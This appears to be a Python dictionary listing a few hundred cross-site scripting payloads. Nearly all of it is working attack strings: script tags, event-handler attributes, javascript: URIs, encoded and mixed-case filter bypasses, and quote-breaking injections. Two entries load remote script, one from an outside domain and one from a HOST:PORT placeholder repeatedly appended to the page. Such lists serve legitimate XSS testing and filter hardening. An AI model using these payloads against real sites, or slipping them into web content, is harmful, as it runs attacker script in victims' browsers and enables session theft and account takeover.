tags = {

    "x1": "<script>alert('XSS');</script>",
    "x2": "<img src='x' onerror='alert(\"XSS\");'>",
    "x3": "<iframe src='javascript:alert(\"XSS\");'></iframe>",
    "x4": "<input type='text' value='<script>alert(\"XSS\");</script>'>",
    "x5": "<body onload='alert(\"XSS\");'>",
    "x6": "<link rel='stylesheet' href='javascript:alert(\"XSS\");'>",
    "x7": "<a href='javascript:alert(\"XSS\");'>Click me</a>",
    "x8": "<form action='javascript:alert(\"XSS\");'>",
    "x9": "<div onmouseover='alert(\"XSS\");'>Hover over me</div>",
    "x10": "<button onclick='alert(\"XSS\");'>Click me</button>",
    "x11": "<meta http-equiv='refresh' content='0;url=javascript:alert(\"XSS\");'>",
    "x12": "<svg onload='alert(\"XSS\");'></svg>",
    "x13": "<object data='javascript:alert(\"XSS\");'></object>",
    "x14": "<embed src='javascript:alert(\"XSS\");'>",
    "x15": "<base href='javascript:alert(\"XSS\");'>",
    "x16": "<audio src='javascript:alert(\"XSS\");'></audio>",
    "x17": "<video src='javascript:alert(\"XSS\");'></video>",
    "x18": "<details ontoggle='alert(\"XSS\");'></details>",
    "x19": "<img src='x' onload='alert(\"XSS\");'>",
    "x20": "<img src='x' onerror='alert(\"XSS\");'>",
    "x21": "<button onclick='alert(\"XSS\");'>Click me</button>",
    "x22": "<div onmouseover='alert(\"XSS\");'>Hover over me</div>",
    "x23": "<input onfocus='alert(\"XSS\");'>",
    "x24": "<input onblur='alert(\"XSS\");'>",
    "x25": "<input onchange='alert(\"XSS\");'>",
    "x26": "<form onsubmit='alert(\"XSS\");'>",
    "x27": "<form onreset='alert(\"XSS\");'>",
    "x28": "<marquee onstart='alert(\"XSS\");'>Scrolling text</marquee>",
    "x29": "<bgsound src='javascript:alert(\"XSS\");'>",
    "x30": "<basefont face='javascript:alert(\"XSS\");'>",
    "x31": "<isindex action='javascript:alert(\"XSS\");'>",
    "x32": "<textarea onfocus='alert(\"XSS\");'></textarea>",
    "x33": "<frame src='javascript:alert(\"XSS\");'>",
    "x34": "<frameset onload='alert(\"XSS\");'></frameset>",
    "x35": "<noframes onload='alert(\"XSS\");'></noframes>",
    "x36": "<applet code='javascript:alert(\"XSS\");'></applet>",
    "x37": "<b onmouseover='alert(\"XSS\");'>Bold text</b>",
    "x38": "<u onclick='alert(\"XSS\");'>Underlined text</u>",
    "x39": "<i onmouseover='alert(\"XSS\");'>Italic text</i>",
    "x40": "<center onmouseover='alert(\"XSS\");'>Centered text</center>",
    "x41": "<span onclick='alert(\"XSS\");'>Span text</span>",
    "x42": "<blink onmouseover='alert(\"XSS\");'>Blinking text</blink>",
    "x43": "<font onmouseover='alert(\"XSS\");'>Font text</font>",
    "x44": "<tt onmouseover='alert(\"XSS\");'>Typewriter text</tt>",
    "x45": "<kbd onmouseover='alert(\"XSS\");'>Keyboard text</kbd>",
    "x46": "<samp onmouseover='alert(\"XSS\");'>Sample text</samp>",
    "x47": "<var onmouseover='alert(\"XSS\");'>Variable text</var>",
    "x48": "<abbr onmouseover='alert(\"XSS\");'>Abbreviated text</abbr>",
    "x49": "<cite onmouseover='alert(\"XSS\");'>Cited text</cite>",
    "x50": "<input onkeydown='alert(\"XSS\");'>",
    "x51": "<input onkeydown='alert(\"XSS\");'>",
    "x52": "<input onkeypress='alert(\"XSS\");'>",
    "x53": "<input onkeyup='alert(\"XSS\");'>",
    "x54": "<input oninput='alert(\"XSS\");'>",
    "x55": "<input onpaste='alert(\"XSS\");'>",
    "x56": "<input oncopy='alert(\"XSS\");'>",
    "x57": "<input oncut='alert(\"XSS\");'>",
    "x58": "<div oncontextmenu='alert(\"XSS\");'>Right-click me</div>",
    "x59": "<div onmouseenter='alert(\"XSS\");'>Enter me</div>",
    "x60": "<div onmouseleave='alert(\"XSS\");'>Leave me</div>",
    "x61": "<div onmousedown='alert(\"XSS\");'>Mouse down</div>",
    "x62": "<div onmouseup='alert(\"XSS\");'>Mouse up</div>",
    "x63": "<div onwheel='alert(\"XSS\");'>Scroll me</div>",
    "x64": "<div ondrop='alert(\"XSS\");'>Drop here</div>",
    "prompt_injection_1": "\"-prompt(8)-\"",
    "prompt_injection_2": "'-prompt(8)-'",
    "prompt_injection_3": "\";a=prompt,a()//",
    "prompt_injection_4": "';a=prompt,a()//",
    "prompt_injection_5": "'-eval(\"window \")-'",
    "prompt_injection_6": "\"-eval(\"window \")-\"",
    "prompt_injection_7": "\"onclick=prompt(8)>\"@x.y",
    "prompt_injection_8": "\"onclick=prompt(8)><svg/onload=prompt(8)>\"@x.y",
    "image_src_onerror_1": "<image/src/onerror=prompt(8)>",
    "img_src_onerror_1": "<img/src/onerror=prompt(8)>",
    "image_src_onerror_2": "<image src/onerror=prompt(8)>",
    "img_src_onerror_2": "<img src/onerror=prompt(8)>",
    "image_src_onerror_3": "<image src =q onerror=prompt(8)>",
    "img_src_onerror_3": "<img src =q onerror=prompt(8)>",
    "script_img_src_onerror": "</scrip</script>t><img src =q onerror=prompt(8)>",
    "svg_onload_1": "<svg onload=alert(1)>",
    "svg_onload_2": "\"><svg onload=alert(1)//",
    "onmouseover_alert_1": "\"onmouseover=alert(1)//",
    "autofocus_onfocus_alert_1": "\"autofocus/onfocus=alert(1)//",
    "alert_1": "'-alert(1)-'",
    "alert_2": "'-alert(1)//",
    "alert_3": "\\'-alert(1)//",
    "script_svg_onload": "</script><svg onload=alert(1)>",
    "x_contenteditable_onblur_alert": "<x contenteditable onblur=alert(1)>lose focus!",
    "x_onclick_alert": "<x onclick=alert(1)>click this!",
    "x_oncopy_alert": "<x oncopy=alert(1)>copy this!",
    "x_oncontextmenu_alert": "<x oncontextmenu=alert(1)>right click this!",
    "x_oncut_alert": "<x oncut=alert(1)>copy this!",
    "x_ondblclick_alert": "<x ondblclick=alert(1)>double click this!",
    "x_ondrag_alert": "<x ondrag=alert(1)>drag this!",
    "x_contenteditable_onfocus_alert": "<x contenteditable onfocus=alert(1)>focus this!",
    "x_contenteditable_oninput_alert": "<x contenteditable oninput=alert(1)>input here!",
    "x_contenteditable_onkeydown_alert": "<x contenteditable onkeydown=alert(1)>press any key!",
    "x_contenteditable_onkeypress_alert": "<x contenteditable onkeypress=alert(1)>press any key!",
    "x_contenteditable_onkeyup_alert": "<x contenteditable onkeyup=alert(1)>press any key!",
    "x_onmousedown_alert": "<x onmousedown=alert(1)>click this!",
    "x_onmousemove_alert": "<x onmousemove=alert(1)>hover this!",
    "x_onmouseout_alert": "<x onmouseout=alert(1)>hover this!",
    "x_onmouseover_alert": "<x onmouseover=alert(1)>hover this!",
    "x_onmouseup_alert": "<x onmouseup=alert(1)>click this!",
    "x_contenteditable_onpaste_alert": "<x contenteditable onpaste=alert(1)>paste here!",
    "script_alert_1": "<script>alert(1)//",
    "script_alert_2": "<script>alert(1)<!–",
    "script_src_alert": "<script src=//brutelogic.com.br/1.js>",
    "script_src_alert_2": "<script src=//3334957647/1>",
    "x_onxxx_alert_1": "%3Cx onxxx=alert(1)",
    "x_onxxx_alert_2": "<%78 onxxx=1",
    "x_onxxx_alert_3": "<x %6Fnxxx=1",
    "x_onxxx_alert_4": "<x o%6Exxx=1",
    "x_onxxx_alert_5": "<x on%78xx=1",
    "x_onxxx_alert_6": "<x onxxx%3D1",
    "x_onxxx_alert_7": "<X onxxx=1",
    "x_onxxx_alert_8": "<x OnXxx=1",
    "x_onxxx_alert_9": "<X OnXxx=1",
    "x_onxxx_alert_10": "<x onxxx=1 onxxx=1",
    "x_onxxx_alert_11": "<x/onxxx=1",
    "x_onxxx_alert_12": "<x%09onxxx=1",
    "x_onxxx_alert_13": "<x%0Aonxxx=1",
    "x_onxxx_alert_14": "<x%0Conxxx=1",
    "x_onxxx_alert_15": "<x%0Donxxx=1",
    "x_onxxx_alert_16": "<x%2Fonxxx=1",
    "x_onxxx_alert_17": "<x 1='1'onxxx=1",
    "x_onxxx_alert_18": "<x 1=\"1\"onxxx=1",
    "x_onxxx_alert_19": "<x </onxxx=1",
    "x_onxxx_alert_20": "<x 1=\">\" onxxx=1",
    "x_onxxx_alert_21": "<http://onxxx%3D1/",
    "x_onxxx_alert_22": "<x onxxx=alert(1) 1='",
    "svg_setInterval_script_src": "<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>",
    "onload_svg_alert": "'onload=alert(1)><svg/1='",
    "alert_script_end_script": "'>alert(1)</script><script/1='",
    "alert_script_comment": "*/alert(1)</script><script>/*",
    "alert_onload_svg_1": "*/alert(1)\"'onload=\"/*<svg/1='",
    "alert_onload_svg_2": "`-alert(1)\"'onload=\"`<svg/1='",
    "alert_script_comment_end_script": "*/</script>'>alert(1)/*<script/1='",
    "script_alert_3": "<script>alert(1)</script>",
    "script_src_js_alert": "<script src=javascript:alert(1)>",
    "iframe_src_js_alert": "<iframe src=javascript:alert(1)>",
    "embed_src_js_alert": "<embed src=javascript:alert(1)>",
    "a_href_js_alert": "<a href=javascript:alert(1)>click",
    "math_brute_js_alert": "<math><brute href=javascript:alert(1)>click",
    "form_action_js_alert": "<form action=javascript:alert(1)><input type=submit>",
    "isindex_action_js_alert": "<isindex action=javascript:alert(1) type=submit value=click>",
    "form_button_js_alert": "<form><button formaction=javascript:alert(1)>click",
    "form_input_submit_js_alert": "<form><input formaction=javascript:alert(1) type=submit value=click>",
    "form_input_image_js_alert": "<form><input formaction=javascript:alert(1) type=image value=click>",
    "form_input_image_src_js_alert": "<form><input formaction=javascript:alert(1) type=image src=SOURCE>",
    "isindex_formaction_js_alert": "<isindex formaction=javascript:alert(1) type=submit value=click>",
    "object_data_js_alert": "<object data=javascript:alert(1)>",
    "iframe_srcdoc_svg_onload_alert": "<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>",
    "svg_script_xlink_alert": "<svg><script xlink:href=data:,alert(1) />",
    "math_brute_xlink_alert": "<math><brute xlink:href=javascript:alert(1)>click",
    "svg_circle_animate_xlink_alert": "<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>",
    "html_ontouchstart_alert": "<html ontouchstart=alert(1)>",
    "html_ontouchend_alert": "<html ontouchend=alert(1)>",
    "html_ontouchmove_alert": "<html ontouchmove=alert(1)>",
    "html_ontouchcancel_alert": "<html ontouchcancel=alert(1)>",
    "html_ongesturestart_alert": "<html ongesturestart=alert(1)>",
    "html_ongesturechange_alert": "<html ongesturechange=alert(1)>",
    "html_ongestureend_alert": "<html ongestureend=alert(1)>",
    "html_onorientationchange_alert": "<html onorientationchange=alert(1)>",
    "html_onerror_alert": "<html onerror=alert(1)>",
    "html_ononline_alert": "<html ononline=alert(1)>",
    "html_onoffline_alert": "<html onoffline=alert(1)>",
    "html_onpopstate_alert": "<html onpopstate=alert(1)>",
    "html_onstorage_alert": "<html onstorage=alert(1)>",
    "html_onhashchange_alert": "<html onhashchange=alert(1)>",
    "html_onafterprint_alert": "<html onafterprint=alert(1)>",
    "html_onbeforeprint_alert": "<html onbeforeprint=alert(1)>",
    "html_onmessage_alert": "<html onmessage=alert(1)>",
    "html_onbeforeunload_alert": "<html onbeforeunload=alert(1)>",
    "html_onpagehide_alert": "<html onpagehide=alert(1)>",
    "html_onpageshow_alert": "<html onpageshow=alert(1)>",
    "html_onresize_alert": "<html onresize=alert(1)>",
    "html_onunload_alert": "<html onunload=alert(1)>",
    "html_onblur_alert": "<html onblur=alert(1)>",
    "html_onchange_alert": "<html onchange=alert(1)>",
    "html_onfocus_alert": "<html onfocus=alert(1)>",
    "html_onreset_alert": "<html onreset=alert(1)>",
    "html_onsearch_alert": "<html onsearch=alert(1)>",
    "html_onselect_alert": "<html onselect=alert(1)>",
    "html_onsubmit_alert": "<html onsubmit=alert(1)>",
    "html_onkeydown_alert": "<html onkeydown=alert(1)>",
    "html_onkeypress_alert": "<html onkeypress=alert(1)>",
    "html_onkeyup_alert": "<html onkeyup=alert(1)>",
    "html_oncontextmenu_alert": "<html oncontextmenu=alert(1)>",
    "html_oncopy_alert": "<html oncopy=alert(1)>",
    "html_oncut_alert": "<html oncut=alert(1)>",
    "html_onpaste_alert": "<html onpaste=alert(1)>",
    "html_onmouse_alert": "<html onmouse=alert(1)>",
    "html_onload_alert": "<html onload=alert(1)>",
    "html_onmouseenter_alert": "<html onmouseenter=alert(1)>",
    "html_onmouseleave_alert": "<html onmouseleave=alert(1)>",
    "html_onmousemove_alert": "<html onmousemove=alert(1)>",
    "html_onmouseout_alert": "<html onmouseout=alert(1)>",
    "html_onmouseover_alert": "<html onmouseover=alert(1)>",
    "html_onmouseup_alert": "<html onmouseup=alert(1)>",
    "html_ondblclick_alert": "<html ondblclick=alert(1)>",
    "html_ondrag_alert": "<html ondrag=alert(1)>",
    "html_ondragend_alert": "<html ondragend=alert(1)>",
    "html_ondragenter_alert": "<html ondragenter=alert(1)>",
    "html_ondragleave_alert": "<html ondragleave=alert(1)>",
    "html_ondragover_alert": "<html ondragover=alert(1)>",
    "html_ondragstart_alert": "<html ondragstart=alert(1)>",
    "html_ondrop_alert": "<html ondrop=alert(1)>",
    "html_onmousewheel_alert": "<html onmousewheel=alert(1)>",
    "html_onscroll_alert": "<html onscroll=alert(1)>",
    "html_onwheel_alert": "<html onwheel=alert(1)>",
    "html_oninput_alert": "<html oninput=alert(1)>",
    "html_oninvalid_alert": "<html oninvalid=alert(1)>",
    "html_onforminput_alert": "<html onforminput=alert(1)>",
    "html_onformchange_alert": "<html onformchange=alert(1)>",
    "html_onloadstart_alert": "<html onloadstart=alert(1)>",
    "html_onloadend_alert": "<html onloadend=alert(1)>",
    "html_onprogress_alert": "<html onprogress=alert(1)>",
    "html_onended_alert": "<html onended=alert(1)>",
    "html_onpause_alert": "<html onpause=alert(1)>",
    "html_onplay_alert": "<html onplay=alert(1)>",
    "html_onplaying_alert": "<html onplaying=alert(1)>",
    "html_onratechange_alert": "<html onratechange=alert(1)>",
    "html_onseeked_alert": "<html onseeked=alert(1)>",
    "html_onseeking_alert": "<html onseeking=alert(1)>",
    "html_onstalled_alert": "<html onstalled=alert(1)>",
    "html_oncanplay_alert": "<html oncanplay=alert(1)>",
    "html_oncanplaythrough_alert": "<html oncanplaythrough=alert(1)>",
    "html_ondurationchange_alert": "<html ondurationchange=alert(1)>",
    "html_onloadedmetadata_alert": "<html onloadedmetadata=alert(1)>",
    "html_onloadeddata_alert": "<html onloadeddata=alert(1)>",
    "html_onabort_alert": "<html onabort=alert(1)>",
    "html_onemptied_alert": "<html onemptied=alert(1)>",
    "html_onwaiting_alert": "<html onwaiting=alert(1)>",
    "html_onsuspend_alert": "<html onsuspend=alert(1)>",
    "html_onvolumechange_alert": "<html onvolumechange=alert(1)>",
    "html_ontimeupdate_alert": "<html ontimeupdate=alert(1)>",
    "html_oncuechange_alert": "<html oncuechange=alert(1)>",
    "html_onoffline_alert": "<html onoffline=alert(1)>",
    "html_ononline_alert": "<html ononline=alert(1)>",
    "html_onshow_alert": "<html onshow=alert(1)>",
    "html_onmessage_alert": "<html onmessage=alert(1)>",
    "html_onstorage_alert": "<html onstorage=alert(1)>",
    "html_onerror_alert": "<html onerror=alert(1)>",
    "html_onpagehide_alert": "<html onpagehide=alert(1)>",
    "html_onpageshow_alert": "<html onpageshow=alert(1)>",
    "html_onbeforeunload_alert": "<html onbeforeunload=alert(1)>",
    "html_onpopstate_alert": "<html onpopstate=alert(1)>",
    
}


